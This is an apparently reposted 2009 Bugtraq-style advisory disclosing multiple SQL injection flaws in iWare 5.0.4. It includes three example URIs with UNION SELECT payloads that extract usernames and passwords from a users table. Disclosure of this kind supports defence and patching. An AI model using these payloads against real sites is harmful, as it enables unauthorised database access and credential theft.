|
Feeds -
Exploits
|
|
Written by boom3rang
|
|
Monday, 30 March 2009 22:18 |
iWare Multiple SQL Injection Vulnerabilities
-\\Bugtraq ID: 34282
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 29 2009 12:00AM
-\\Updated: Mar 30 2009 08:46PM
-\\Credit: boom3rang
-\\Vulnerable: iWare iWare 5.0.4
-\\Discussion iWare is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iWare 5.0.4 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?D=63'/**/and/**/1=2/**/UNION/**/SELECT/ **/concat(username,char(58),password)+from+demo_users/*
http://www.example.com/index.php?D=52&cmd=33&file=NewsArticles_1.0.0& amp;view=1&category=&id=3'/**/and/**/1=2/**/UNION/**/SELECT/**/0, 1,2,concat(username,char(58),password),4,null+from+demo_users/*
http://www.example.com/index.php?D=54&cmd=33&file=ImageGallery_1.0.0& amp;category=2'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,null,concat(userna me,char(58),password)+from+demo_users/*
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --iWare Home Page http://www.dsiware.com (iWare)
|